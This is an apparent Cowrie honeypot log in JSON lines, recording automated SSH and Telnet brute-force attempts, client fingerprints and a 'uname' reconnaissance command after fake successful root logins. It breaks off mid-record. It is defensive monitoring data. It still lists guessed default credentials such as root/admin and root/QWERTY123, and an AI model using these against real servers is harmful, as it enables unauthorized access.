{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40458,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cc729260155","protocol":"ssh","message":"New connection: 212.227.235.229:40458 (1.2.3.4:22) [session: 5cc729260155]","sensor":"my-vps","timestamp":"2025-08-28T05:54:11.537559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:54:11.538360Z","src_ip":"212.227.235.229","session":"5cc729260155"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:54:11.683228Z","src_ip":"212.227.235.229","session":"5cc729260155"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:12.117567Z","src_ip":"212.227.235.229","session":"5cc729260155"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:13.263028Z","src_ip":"212.227.235.229","session":"5cc729260155"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58008,"dst_ip":"1.2.3.4","dst_port":23,"session":"c565271214fb","protocol":"telnet","message":"New connection: 212.227.125.160:58008 (1.2.3.4:23) [session: c565271214fb]","sensor":"my-vps","timestamp":"2025-08-28T05:54:13.527539Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:54:13.611223Z","src_ip":"212.227.125.160","session":"c565271214fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:54:13.699160Z","src_ip":"212.227.125.160","session":"c565271214fb"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":19391,"dst_ip":"1.2.3.4","dst_port":22,"session":"37bba77f44db","protocol":"ssh","message":"New connection: 80.94.95.15:19391 (1.2.3.4:22) [session: 37bba77f44db]","sensor":"my-vps","timestamp":"2025-08-28T05:54:19.741159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:54:19.742144Z","src_ip":"80.94.95.15","session":"37bba77f44db"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:54:19.834780Z","src_ip":"80.94.95.15","session":"37bba77f44db"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia","message":"login attempt [lucia/lucia] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:20.248685Z","src_ip":"80.94.95.15","session":"37bba77f44db"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia1","message":"login attempt [lucia/lucia1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:21.971533Z","src_ip":"80.94.95.15","session":"37bba77f44db"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia123","message":"login attempt [lucia/lucia123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:23.065726Z","src_ip":"80.94.95.15","session":"37bba77f44db"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia1234","message":"login attempt [lucia/lucia1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:24.164901Z","src_ip":"80.94.95.15","session":"37bba77f44db"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia12345","message":"login attempt [lucia/lucia12345] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:25.587119Z","src_ip":"80.94.95.15","session":"37bba77f44db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54032,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b9bf44593d2","protocol":"ssh","message":"New connection: 212.227.125.160:54032 (1.2.3.4:22) [session: 2b9bf44593d2]","sensor":"my-vps","timestamp":"2025-08-28T05:54:26.095205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:54:26.096105Z","src_ip":"212.227.125.160","session":"2b9bf44593d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:54:26.200832Z","src_ip":"212.227.125.160","session":"2b9bf44593d2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:26.521003Z","src_ip":"212.227.125.160","session":"2b9bf44593d2"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:26.684199Z","src_ip":"80.94.95.15","session":"37bba77f44db"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:27.677687Z","src_ip":"212.227.125.160","session":"2b9bf44593d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58214,"dst_ip":"1.2.3.4","dst_port":22,"session":"25991d0c438d","protocol":"ssh","message":"New connection: 212.227.125.160:58214 (1.2.3.4:22) [session: 25991d0c438d]","sensor":"my-vps","timestamp":"2025-08-28T05:54:34.016250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:54:34.042630Z","src_ip":"212.227.125.160","session":"25991d0c438d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:54:34.132506Z","src_ip":"212.227.125.160","session":"25991d0c438d"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:34.540807Z","src_ip":"212.227.125.160","session":"25991d0c438d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:35.647430Z","src_ip":"212.227.125.160","session":"25991d0c438d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38368,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee4b558ea6a6","protocol":"ssh","message":"New connection: 212.227.235.229:38368 (1.2.3.4:22) [session: ee4b558ea6a6]","sensor":"my-vps","timestamp":"2025-08-28T05:54:41.777602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:54:41.778312Z","src_ip":"212.227.235.229","session":"ee4b558ea6a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:54:41.923004Z","src_ip":"212.227.235.229","session":"ee4b558ea6a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38028,"dst_ip":"1.2.3.4","dst_port":22,"session":"291b8ea7d37a","protocol":"ssh","message":"New connection: 212.227.235.229:38028 (1.2.3.4:22) [session: 291b8ea7d37a]","sensor":"my-vps","timestamp":"2025-08-28T05:54:42.352080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:54:42.352848Z","src_ip":"212.227.235.229","session":"291b8ea7d37a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:42.357214Z","src_ip":"212.227.235.229","session":"ee4b558ea6a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:54:42.496925Z","src_ip":"212.227.235.229","session":"291b8ea7d37a"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T05:54:42.933361Z","src_ip":"212.227.235.229","session":"291b8ea7d37a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:43.502782Z","src_ip":"212.227.235.229","session":"ee4b558ea6a6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:44.080319Z","src_ip":"212.227.235.229","session":"291b8ea7d37a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36386,"dst_ip":"1.2.3.4","dst_port":22,"session":"3554569c4f8e","protocol":"ssh","message":"New connection: 212.227.125.160:36386 (1.2.3.4:22) [session: 3554569c4f8e]","sensor":"my-vps","timestamp":"2025-08-28T05:54:48.784576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:54:48.821132Z","src_ip":"212.227.125.160","session":"3554569c4f8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:54:48.896255Z","src_ip":"212.227.125.160","session":"3554569c4f8e"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:54:49.344222Z","src_ip":"212.227.125.160","session":"3554569c4f8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:54:49.712188Z","src_ip":"212.227.125.160","session":"3554569c4f8e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:54:49.712862Z","src_ip":"212.227.125.160","session":"3554569c4f8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:49.818879Z","src_ip":"212.227.125.160","session":"3554569c4f8e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:49.819883Z","src_ip":"212.227.125.160","session":"3554569c4f8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52800,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbd4f0c2bffe","protocol":"ssh","message":"New connection: 212.227.235.229:52800 (1.2.3.4:22) [session: fbd4f0c2bffe]","sensor":"my-vps","timestamp":"2025-08-28T05:54:56.225385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:54:56.226375Z","src_ip":"212.227.235.229","session":"fbd4f0c2bffe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:54:56.369375Z","src_ip":"212.227.235.229","session":"fbd4f0c2bffe"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:54:56.799847Z","src_ip":"212.227.235.229","session":"fbd4f0c2bffe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:54:57.100923Z","src_ip":"212.227.235.229","session":"fbd4f0c2bffe"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:54:57.101634Z","src_ip":"212.227.235.229","session":"fbd4f0c2bffe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:57.252887Z","src_ip":"212.227.235.229","session":"fbd4f0c2bffe"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:54:57.254024Z","src_ip":"212.227.235.229","session":"fbd4f0c2bffe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35728,"dst_ip":"1.2.3.4","dst_port":22,"session":"53beda701d0b","protocol":"ssh","message":"New connection: 212.227.125.160:35728 (1.2.3.4:22) [session: 53beda701d0b]","sensor":"my-vps","timestamp":"2025-08-28T05:55:06.669796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:55:06.670829Z","src_ip":"212.227.125.160","session":"53beda701d0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 